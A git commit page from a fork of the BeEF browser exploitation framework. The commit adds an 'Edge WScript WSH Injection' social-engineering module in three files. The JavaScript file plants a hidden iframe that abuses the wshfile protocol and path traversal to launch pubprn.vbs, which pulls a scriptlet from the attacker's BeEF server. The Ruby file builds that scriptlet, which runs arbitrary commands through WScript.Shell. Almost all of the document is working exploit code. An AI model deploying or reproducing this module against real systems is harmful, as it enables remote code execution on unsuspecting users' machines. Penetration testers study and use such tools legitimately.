Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Edge WScript WSH Injection module

Browse Source
This commit is contained in:
Brendan Coles
2019-03-30 00:18:59 +00:00
parent a103ca3f30
commit c385b1a352
3 changed files with 111 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

31
modules/social_engineering/edge_wscript_wsh_injection/command.js Executable file
View File

@@ -0,0 +1,31 @@
//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function(){
var timeout = 5;
if (!beef.browser.isEdge()) {
beef.debug("[Edge WScript WSH Injection] Browser is not supported.");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error());
return;
}
try {
var wsh_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
var beef_host = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port;
wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/en-US/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html');
} catch (e) {
beef.debug("[Edge WScript WSH Injection] Could not create iframe");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error());
return;
}
// clean up
cleanup = function() {
document.body.removeChild(wsh_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

20
modules/social_engineering/edge_wscript_wsh_injection/config.yaml Executable file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
edge_wscript_wsh_injection:
enable: true
category: ["Social Engineering"]
name: "Edge WScript WSH Injection"
description: "Prompts the user to run \"Microsoft Windows Based Script Host\" (WScript.exe).<br/><br/>Uses <a href='https://leucosite.com/Microsoft-Edge-RCE/'>wshfile protocol handler</a> technique to load pubprn.vbs and <a href='https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'>WSH injection in pubprn.vbs</a> to execute arbitrary code.<br/><br/>If the user allows execution, a VBS payload is downloaded from BeEF, and the specified commands are executed."
authors: [
"@qab", # wshfile protocol handler + traversal technique, and exploit
"@enigma0x3", # pubprn.vbs technique and exploit
"bcoles" # BeEF
]
target:
user_notify: ["E"]
not_working: ["ALL"]

60
modules/social_engineering/edge_wscript_wsh_injection/module.rb Executable file
View File

@@ -0,0 +1,60 @@
#
# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Edge_wscript_wsh_injection < BeEF::Core::Command
def pre_send
payload = ''
@datastore.each do |input|
if input['name'] == 'payload'
payload = input['value']
end
end
rand_str = rand(32**10).to_s(32)
script = <<-EOF
<?XML version="1.0"?>
<scriptlet>
<registration
description="#{rand_str}"
progid="#{rand_str}"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("#{payload.gsub('"', '\\"')}");
]]>
</script>
</scriptlet>
EOF
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
{
'Content-Type' => 'text/html'
},
script,
"/#{@command_id}/index.html",
-1
)
end
def self.options
return [
{'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"}
]
end
def post_execute
save({'result' => @datastore['result']})
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html")
end
end